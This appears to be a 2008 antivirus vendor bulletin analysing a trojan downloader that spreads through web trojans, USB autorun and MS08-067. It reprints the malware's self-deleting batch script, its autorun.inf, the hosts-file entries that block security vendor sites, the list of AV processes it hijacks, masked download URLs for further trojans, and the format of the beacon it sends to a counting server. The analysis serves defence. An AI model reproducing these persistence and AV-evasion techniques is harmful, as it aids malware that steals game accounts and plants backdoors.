捕獲時間
2008-12-5
病毒摘要
該樣本是使用C語言編寫的木馬下載器,由微點主動防御軟件自動捕獲,未加殼,長度為“86,421 字節(jié)”,圖標(biāo)為
,病毒擴(kuò)展名為“exe”,主要通過“網(wǎng)頁木馬”、“局域網(wǎng)感染”、“漏洞利用”、“文件捆綁”等方式傳播,病毒融合了機(jī)器狗、MS-08067漏洞溢出攻擊以及AV殺手的各項攻擊技術(shù)特點,是一種新興的綜合型下載者,最終目的是下載大量各類木馬至本地運行,實現(xiàn)各類網(wǎng)游盜號、設(shè)立后門等操作,使用戶利益受到損害。
感染對象
Windows 2000/Windows XP/Windows 2003
傳播途徑
網(wǎng)頁木馬、文件捆綁
防范措施
已安裝使用微點主動防御軟件的用戶,無須任何設(shè)置,微點主動防御將自動保護(hù)您的系統(tǒng)免受該病毒的入侵和破壞。無論您是否已經(jīng)升級到最新版本,微點主動防御都能夠有效清除該病毒。如果您沒有將微點主動防御軟件升級到最新版,微點主動防御軟件在發(fā)現(xiàn)該病毒后將報警提示您發(fā)現(xiàn)“未知間諜軟件”,請直接選擇刪除處理(如圖1);
圖1 主動防御自動捕獲未知病毒(未升級)
如果您已經(jīng)將微點主動防御軟件升級到最新版本,微點將報警提示您發(fā)現(xiàn)"Trojan-Downloader.Win32.Agent.akqb”,請直接選擇刪除(如圖2)。
圖2 升級后截獲已知病毒
對于未使用微點主動防御軟件的用戶,微點反病毒專家建議:
1、不要在不明站點下載非官方版本的軟件進(jìn)行安裝,避免病毒通過捆綁的方式進(jìn)入您的系統(tǒng)。
2、盡快將您的殺毒軟件特征庫升級到最新版本進(jìn)行查殺,并開啟防火墻攔截網(wǎng)絡(luò)異常訪問,如依然有異常情況請注意及時與專業(yè)的安全軟件廠商聯(lián)系獲取技術(shù)支持。
3、開啟windows自動更新,及時打好漏洞補丁。
病毒分析
該樣本程序被執(zhí)行后,首先將進(jìn)行防調(diào)試判斷,遍歷OllyICE.exe、OllyDbg.exe、ImportREC.exe、C32Asm.exe、LordPE.exe、PEditor.exe等調(diào)試軟件進(jìn)程,若遍歷獲得,則停止一切操作,進(jìn)程退出。
成功執(zhí)行后,樣本將在系統(tǒng)文件夾“%Temp%”下釋放動態(tài)庫文件“dll375.dll”,該動態(tài)庫文件的命名特點是三位數(shù)字為隨機(jī),在“%SystemRoot%\system32”文件夾下釋放驅(qū)動文件“Nskhelper2.sys”,將“Nskhelper2.sys”注冊為名為“NsRk1”的服務(wù),創(chuàng)建名為“\\.\NsRk1”的設(shè)備,相關(guān)注冊表項如下:
| |
項:“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NsRk1”
鍵:“Type”
數(shù)據(jù):“SERVICE KERNEL DRIVER”
鍵:“Start”
數(shù)據(jù):“SERVICE DEMAND START”
鍵:“ImagePath”
數(shù)據(jù):“\??\C:\WINDOWS\system32\Nskhelper2.sys”
鍵:“DisplayName”
數(shù)據(jù):“NsRk1” |
|
啟動“svchost.exe”,在其中劃出一塊內(nèi)存空間,將“dll375.dll”注入其中,啟動十余個線程共同操作。修改注冊表,將下列安全及輔助工具進(jìn)程映像劫持,指向“svchost.exe”。
360safe.exe
360safebox.exe
360tray.exe
ACKWIN32.exe
ANTI-TROJAN.exe
anti.exe
antivir.exe
APVXDWIN.exe
atrack.exe
AUTODOWN.exe
AVCONSOL.exe
AVE32.exe
AVGCTRL.exe
avk.exe
AVKSERV.exe
avp.exe
AVPUPD.exe
AVSCHED32.exe
avsynmgr.exe
AVWIN95.exe
avxonsol.exe
BLACKD.exe
BLACKICE.exe
CCenter.exe
CFIADMIN.exe
CFIAUDIT.exe
CFIND.exe
cfinet.exe
cfinet32.exe
CLAW95.exe
CLAW95CT.exe
CLEANER.exe
CLEANER3.exe
DAVPFW.exe
dbg.exe
debu.exe
DV95.exe
DV95_O.exe
DVP95.exe
ECENGINE.exe
EFINET32.exe
ESAFE.exe
ESPWATCH.exe
explorewclass.exe
F-AGNT95.exe
F-PROT.exe
f-prot95.exe
f-stopw.exe
FINDVIRU.exe
fir.exe
fp-win.exe
FRW.exe
IAMAPP.exe
IAMSERV.exe
IBMASN.exe
IBMAVSP.exe
ice.exe
IceSword.exe
ICLOAD95.exe
ICLOADNT.exe
ICMOON.exe
ICSSUPPNT.exe
iom.exe
iomon98.exe
JED.exe
Kabackreport.exe
Kasmain.exe
kav32.exe
kavstart.exe
kissvc.exe
KPFW32.exe
kpfwsvc.exe
KPPMain.exe
KRF.exe
KVMonXP.exe
KVPreScan.exe
kwatch.exe
lamapp.exe
lockdown2000.exe
LOOKOUT.exe
luall.exe
LUCOMSERVER.exe
mcafee.exe
microsoft.exe
mon.exe
moniker.exe
MOOLIVE.exe
MPFTRAY.exe
ms.exe
N32ACAN.exe
navapsvc.exe
navapw32.exe
NAVLU32.exe
NAVNT.exe
navrunr.exe
NAVSCHED.exe
NAVW.exe
NAVW32.exe
navwnt.exe
nisserv.exe
nisum.exe
NMAIN.exe
NORMIST.exe
norton.exe
NUPGRADE.exe
NVC95.exe
office.exe
OUTPOST.exe
PADMIN.exe
PAVCL.exe
pcc.exe
PCCClient.exe
pccguide.exe
pcciomon.exe
pccmain.exe
pccwin98.exe
PCFWALLICON.exe
PERSFW.exe
pop3trap.exe
PpPpWallRun.exe
program.exe
prot.exe
pview95.exe
ras.exe
Rav.exe
RAV7.exe
rav7win.exe
RavMon.exe
RavMonD.exe
RavStub.exe
RavTask.exe
regedit.exe
rescue32.exe
Rfw.exe
rn.exe
safeboxTray.exe
safeweb.exe
scam32.exe
scan.exe
SCAN32.exe
SCANPM.exe
scon.exe
SCRSCAN.exe
secu.exe
SERV95.exe
sirc32.exe
SMC.exe
smtpsvc.exe
SPHINX.exe
spy.exe
SWEEP95.exe
symproxysvc.exe
TBSCAN.exe
TCA.exe
TDS2-98.exe
TDS2-NT.exe
Tmntsrv.exe
TMOAgent.exe
tmproxy.exe
tmupdito.exe
TSC.exe
UlibCfg.exe
vavrunr.exe
VET95.exe
VETTRAY.exe
vir.exe
VPC32.exe
VSECOMR.exe
vshwin32.exe
VSSCAN40
vsstat.exe
WEBSCAN.exe
WEBSCANX.exe
webtrap.exe
WFINDV32.exe
windows優(yōu)化大師.exe
wink.exe
zonealarm.exe
生成隨機(jī)名批處理文件“13578984.bat”,實現(xiàn)自刪除,批處理如下:
| |
:Repeat
del /f "C:\Documents and Settings\Administrator\桌面\4326236436.exe"
if exist "C:\Documents and Settings\Administrator\桌面\4326236436.exe" goto Repeat
del /f "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\13578984.bat" |
|
驅(qū)動文件“Nskhelper2.sys”加載后,將恢復(fù)系統(tǒng)SSDT表,使部分安全軟件主動防御功能失效,并關(guān)閉指定殺毒軟件進(jìn)程。
被注入后的“svchost.exe”將在各本地磁盤根目錄生成“autorun.inf”配置文件與“dll375.dll”相同的數(shù)據(jù)文件“system.dll”,使用戶打開磁盤后通過rundll32.exe加載“system.dll”;“autorun.inf”內(nèi)容如下:
| |
[autorun]
shell\open\command=rundll32 system.dll,explore
shell\explore\command=rundll32 system.dll,explore |
|
修改“%SystemRoot%\system32\drivers\etc”文件夾下的“hosts”文件,將以下安全廠商站點指向“127.0.0.1”,HOST文件如下:
127.0.0.1 www.360.cn
127.0.0.1 www.360safe.cn
127.0.0.1 www.360safe.com
127.0.0.1 www.chinakv.com
127.0.0.1 www.rising.com.cn
127.0.0.1 rising.com.cn
127.0.0.1 dl.jiangmin.com
127.0.0.1 jiangmin.com
127.0.0.1 www.jiangmin.com
127.0.0.1 www.duba.net
127.0.0.1 www.eset.com.cn
127.0.0.1 www.nod32.com
127.0.0.1 shadu.duba.net
127.0.0.1 union.kingsoft.com
127.0.0.1 www.kaspersky.com.cn
127.0.0.1 kaspersky.com.cn
127.0.0.1 virustotal.com
127.0.0.1 www.kaspersky.com
127.0.0.1 www.cnnod32.cn
127.0.0.1 www.lanniao.org
127.0.0.1 www.nod32club.com
127.0.0.1 www.dswlab.com
127.0.0.1 bbs.sucop.com
127.0.0.1 www.virustotal.com
127.0.0.1 tool.ikaka.com
127.0.0.1 360.qihoo.com
訪問網(wǎng)絡(luò),下載“http://txt.**nb.com/update/count.txt”,存儲至“%Temp%”文件夾,重命名為隨機(jī)文件名,讀取文件列表,下載后運行,其中包含了大量盜號木馬,文件列表如下:
| |
http://u3.www-s**cn.com/ly/a4.exe
http://u3.www-s**cn.com/ly/a1.exe
http://u3.www-s**cn.com/ly/a3.exe
http://u3.www-s**cn.com/ly/a10.exe
http://u3.www-s**cn.com/ly/a40.exe
http://u3.www-s**cn.com/ly/a25.exe
http://u3.www-s**cn.com/ly/a13.exe
http://u3.www-s**cn.com/ly/a36.exe
http://u3.www-s**cn.com/ly/a41.exe
http://u3.www-s**cn.com/ly/a9.exe
http://u3.www-s**cn.com/ly/a49.exe
http://u3.www-s**cn.com/ly/a23.exe
http://u3.www-s**cn.com/ly/a32.exe
http://u3.www-s**cn.com/ly/a42.exe
http://u1.www-s**cn.com/hm/b12.exe
http://u1.www-s**cn.com/hm/b17.exe
http://u1.www-s**cn.com/hm/b13.exe
http://u1.www-s**cn.com/hm/b35.exe
http://u1.www-s**cn.com/hm/b15.exe
http://u1.www-s**cn.com/hm/b7.exe
http://u1.www-s**cn.com/hm/b21.exe
http://u1.www-s**cn.com/hm/b16.exe
http://u1.www-s**cn.com/hm/b44.exe
http://u2.www-s**cn.com/hm/b3.exe
http://u2.www-s**cn.com/hm/b10.exe
http://u2.www-s**cn.com/hm/b5.exe
http://u2.www-s**cn.com/hm/b8.exe
http://u2.www-s**cn.com/hm/b2.exe
http://u2.www-s**cn.com/hm/b4.exe
http://u2.www-s**cn.com/hm/b11.exe
http://u2.www-s**cn.com/hm/b1.exe
http://u4.www-s**cn.com/bm/c1.exe
http://u4.www-s**cn.com/bm/c2.exe
http://u4.www-s**cn.com/vip/aaa.exe
http://u4.www-s**cn.com/vip/cj.exe |
|
連接網(wǎng)絡(luò),訪問網(wǎng)絡(luò)“http://count.r**luu.com/40/count.asp”,按照格式“mac=*&os=*&ver=*&temp=*&key=*”,上傳本機(jī)網(wǎng)卡MAC地址,操作系統(tǒng)及其版本等信息進(jìn)行感染統(tǒng)計。
在系統(tǒng)目錄“%SystemRoot%\system32”生成“appwinproc.dll”, “appwinproc.dll”加載后,將進(jìn)行輔助關(guān)閉安全軟件進(jìn)程的工作。
根據(jù)機(jī)器狗讀寫物理磁盤原理,在“%SystemRoot%\system32\”文件夾下生成五個驅(qū)動文件“NsPass0.sys”、“ NsPass1.sys”、“ NsPass2.sys”、“ NsPass3.sys”、“ NsPass4.sys”。分別針對“%SystemRoot%\system32\”文件夾下的“schedsvc.dll”、 “appmgmts.dll”、 “srsvc.dll”、 “w32time.dll”、 “wiaservc.dll”五個文件進(jìn)行改寫,在頭部加入“dll375.dll”的代碼,使以上文件相對應(yīng)的系統(tǒng)服務(wù) “Task Scheduler”、 “Application Management”、“System Restore Service”、 “Windows Time” 、“Windows Image Acquisition ”啟動時一同啟動病毒。
病毒還將嘗試掃描本機(jī)網(wǎng)段內(nèi)的其他機(jī)器,掃描成功后將在“%Temp%”文件夾內(nèi)生成一個隨機(jī)文件名的動態(tài)庫文件,使用“rundll32.exe”將其加載,利用近期爆出的“MS-08067”漏洞,嘗試溢出局域網(wǎng)其他計算機(jī),進(jìn)行病毒傳播。
